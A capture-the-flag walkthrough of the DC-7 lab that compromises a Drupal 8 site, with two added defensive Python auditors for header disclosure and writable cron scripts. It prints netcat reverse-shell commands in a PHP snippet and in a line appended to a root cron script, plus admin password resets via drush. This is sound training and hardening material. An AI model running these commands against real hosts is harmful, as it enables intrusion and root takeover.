Pentesting DC-7

Target description

Download: http://www.five86.com/downloads/DC-7.zip

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

While this isn't an overly technical challenge, it isn't exactly easy.

While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.

What you will need to do, is to think "outside" of the box.

Waaaaaay "outside" of the box. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Information gathering

Scan the local subnet for live hosts; the target host is 172.18.1.143.

```bash
arp-scan -l
```

Scan the target for open ports; ports 22 and 80 are open.

```bash
nmap -A 172.18.1.143
```

As usual, browse to the HTTP port; it is a web application.

Fingerprint the website:

```bash
whatweb -v http://172.18.1.143/
```

This turns up the following information:

```text
┌──(root㉿kali)-[~]
└─# whatweb -v http://172.18.1.143/
WhatWeb report for http://172.18.1.143/
Status : 200 OK
Title : Welcome to DC-7 | D7
IP : 172.18.1.143
Country : RESERVED, ZZ

Summary : Drupal, Script, HTML5, PoweredBy[-block], MetaGenerator[Drupal 8 (https://www.drupal.org)], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Content-Language[en], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], Apache[2.4.25], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache]

Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.

Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/

[ Content-Language ]
Detect the content-language setting from the HTTP header.

String : en

[ Drupal ]
Drupal is an opensource CMS written in PHP.

Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.drupal.org

[ HTML5 ]
HTML version 5, detected by the doctype declaration


[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)

[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.

String : Drupal 8 (https://www.drupal.org)

[ PoweredBy ]
This plugin identifies instances of 'Powered by x' text and
attempts to extract the value for x.

String : -block

[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.


[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com

String : x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache (from headers)

[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx

String : SAMEORIGIN

[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx

String : IE=edge

HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 20 Dec 2023 20:23:49 GMT
Server: Apache/2.4.25 (Debian)
Cache-Control: must-revalidate, no-cache, private
X-Drupal-Dynamic-Cache: MISS
Link: <http://172.18.1.143/node/1>; rel="canonical"
Link: <http://172.18.1.143/node/1>; rel="shortlink"
Link: <http://172.18.1.143/node/1>; rel="revision"
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Accept-Encoding
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Cache: HIT
Content-Encoding: gzip
Content-Length: 2653
Connection: close
Content-Type: text/html; charset=UTF-8
```
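The whatweb output is just as useful from the defender's side: the Server and X-Generator headers hand the web-server version and the CMS version to anyone who asks, which is what let the scan identify Drupal 8 on Apache 2.4.25 in one request. The script below is an added example (not code from the original post) that parses a raw header block like the one above, lists the headers that disclose product or version information, and reports which common hardening headers are absent. The header sample is constructed from the response shown above, trimmed to the relevant lines.

```python
"""Audit an HTTP response header block for version disclosure and missing hardening headers.
Added example for this write-up; not code from the original post."""
import re

# Constructed sample: the response the whatweb run reported above, trimmed to the relevant lines.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Date: Wed, 20 Dec 2023 20:23:49 GMT
Server: Apache/2.4.25 (Debian)
X-Drupal-Dynamic-Cache: MISS
Link: <http://172.18.1.143/node/1>; rel="canonical"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Cache: HIT
Content-Type: text/html; charset=UTF-8
"""

# Headers that reveal the software stack; hardening guides recommend removing or blanking them.
DISCLOSURE_HEADERS = {
    "server", "x-powered-by", "x-generator", "x-aspnet-version",
    "x-drupal-cache", "x-drupal-dynamic-cache",
}
# Defensive headers a reviewer expects on an HTML response.
EXPECTED_HEADERS = {"x-content-type-options", "x-frame-options", "content-security-policy"}

# First run of digits, optionally dotted: "2.4.25" in "Apache/2.4.25", "8" in "Drupal 8"
VERSION_RE = re.compile(r"\d+(?:\.\d+)*")


def parse_headers(raw):
    """Return a list of (name, value) pairs, skipping the status line and blank lines."""
    pairs = []
    for line in raw.splitlines():
        if not line.strip() or line.startswith("HTTP/"):
            continue
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def audit_headers(raw):
    """Classify headers: which disclose products/versions, and which hardening headers are missing."""
    pairs = parse_headers(raw)
    seen = {name.lower() for name, _ in pairs}
    disclosures = []
    for name, value in pairs:
        if name.lower() in DISCLOSURE_HEADERS:
            m = VERSION_RE.search(value)
            disclosures.append({"header": name, "value": value, "version": m.group(0) if m else None})
    missing = sorted(EXPECTED_HEADERS - seen)
    return {"disclosures": disclosures, "missing": missing}


if __name__ == "__main__":
    report = audit_headers(SAMPLE_HEADERS)
    for d in report["disclosures"]:
        print(f"disclosure: {d['header']}: {d['value']}  (version: {d['version']})")
    print("missing hardening headers:", ", ".join(report["missing"]) or "none")
```

On the sample this flags Server (2.4.25), X-Generator (8) and the two X-Drupal-Cache headers, and reports Content-Security-Policy as missing. On Apache the Server value is trimmed with `ServerTokens Prod`, and Drupal's X-Generator header can be stripped at the reverse proxy or web server; neither change stops a determined fingerprinter, but it removes the free version string that drives tools like whatweb.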

Scan for directories; nothing useful turns up.

```bash
dirsearch -u http://172.18.1.143/ -i 200
```

Following the hint in the target description, more information is needed, so I went straight to social engineering: searching directly on the username.

After finding the source code, look through the relevant configuration file; it contains a username and password, and after trying them, they turn out to work for SSH.

Exploitation phase

SSH connection

```bash
ssh dc7user@172.18.1.143
```

Look for useful information

In the current directory there is a web backup file and an mbox. The backup file appears to be a compressed archive of the site's source code, so we look at the mbox file.

Here we find a root-owned bash script, and that script is a scheduled task.

From the mbox contents, the script runs every fifteen minutes.

Check the file's permissions:

```bash
ls -la
```

```text
-rwxrwxr-x
```

The root user and its group (www-data) can read, write and execute it, but other users have no write permission.

That means our current user cannot write a reverse-shell command into the script. Looking at the file's contents first, we find a drush command.

Looking up the relevant information, this is a database export file.

We can also use the drush command to change a user's password.

```bash
# First check the user's information
drush user-information username
```

This confirms that an admin user exists (we need to change into the site directory before drush commands will run).

Use drush to change the administrator's password:

```bash
drush upwd admin --password="123456"
```

With a username and password, we can log in to the website.

Into the admin backend

In the logged-in administration interface we find that articles can be edited and the text format can be changed, which means we can write PHP here.

But this site does not have the PHP interpreter module installed, so we first need to install one.

```text
# Official Drupal link for the PHP interpreter module
https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
```

The URL cannot be fetched from the target, so the only option is to download it locally and upload it.

Once the import succeeds, we need to install (enable) the PHP module.

Use PHP to get a reverse shell:

```php
<?php
system('nc -e /bin/sh 172.18.1.128 1234')
?>
```

Start the listener on Kali first, then save the shell file.

Upgrade the shell with Python:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

We already learned during the earlier steps that www-data has write permission on the script, so writing a reverse-shell line into it as the current user is enough to get root:

```bash
echo "nc -e /bin/bash 172.18.1.128 4321" >> /opt/scripts/backups.sh
```

Although this is a scheduled task, you can also consider running it manually, since we already have www-data privileges.
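The permission check earlier (a root-owned backups.sh that the www-data group can write to) and the escalation it enables here are exactly what a host audit should catch before an attacker does: a root cron job whose script is writable by any other principal is a standing privilege-escalation path. The script below is an added example, not part of the original write-up and not code from the DC-7 box. It parses /etc/crontab-style entries, stats each job's script and reports jobs whose script is group- or world-writable. The crontab text is constructed from the page's description (a root job every fifteen minutes); the real entry is not shown on the page, and the demo creates temporary files with the weak mode and a correct mode because the box is not available here.

```python
"""Find cron jobs whose script can be modified by users other than its owner.
Added example for this write-up; not code from the original post or from the DC-7 box."""
import os
import re
import stat
import tempfile

# Constructed sample in /etc/crontab format, modelled on the page's description
# (a root-owned script run every fifteen minutes). The real DC-7 entry is not shown on the page.
SAMPLE_CRONTAB = """# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/15 * * * * root /opt/scripts/backups.sh
0 3 * * * root /usr/local/bin/rotate-logs --quiet
"""

# five schedule fields, then the user, then the command
SYSTEM_CRON_RE = re.compile(r"^((?:\S+\s+){4}\S+)\s+(\S+)\s+(\S.*)$")


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)


def writable_by_non_owner(path):
    """Return the reasons a file could be changed by someone other than its owner (empty if none)."""
    mode = os.stat(path).st_mode
    reasons = []
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_crontab(text, path_map=None):
    """Return a finding for every job whose script is group- or world-writable.

    path_map optionally redirects a command path to another file; the demo uses it to
    point the sample entries at temporary files instead of real system paths.
    """
    path_map = path_map or {}
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        script = command.split()[0]
        target = path_map.get(script, script)
        if not os.path.isfile(target):
            continue  # script absent on this host: nothing to check
        reasons = writable_by_non_owner(target)
        if reasons:
            findings.append({"script": script, "user": user, "schedule": schedule, "reasons": reasons})
    return findings


def demo():
    """Create a 0775 script (the DC-7 situation) and a 0755 script, then audit the sample crontab."""
    with tempfile.TemporaryDirectory() as tmp:
        weak = os.path.join(tmp, "backups.sh")
        good = os.path.join(tmp, "rotate-logs")
        for path in (weak, good):
            with open(path, "w") as fh:
                fh.write("#!/bin/bash\n")
        os.chmod(weak, 0o775)  # rwxrwxr-x, the mode ls -la showed on the box
        os.chmod(good, 0o755)  # rwxr-xr-x
        return audit_crontab(SAMPLE_CRONTAB, {
            "/opt/scripts/backups.sh": weak,
            "/usr/local/bin/rotate-logs": good,
        })


if __name__ == "__main__":
    for f in demo():
        print(f"{f['user']} job '{f['schedule']}' runs {f['script']}: {', '.join(f['reasons'])}")
```

The demo reports only the 0775 script. A fuller audit would also walk /etc/cron.d and the per-user crontabs, check that every directory on the script's path is not writable by others either, and treat any group other than the job's own user as a finding even when the group bit looks intended, since "root and www-data" was exactly the combination that was fatal here. The fix on a box like this is `chmod 755` (or `chmod g-w`) on the script and keeping its group as root.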

Finding the flag

```bash
find / -name '*flag*'
```

```bash
cat /root/theflag.txt
```

Summary

  • Social engineering (information gathering)
  • Drupal content management system
  • Linux scheduled tasks (cron daemon)
  • File read/write permissions
  • PHP reverse shell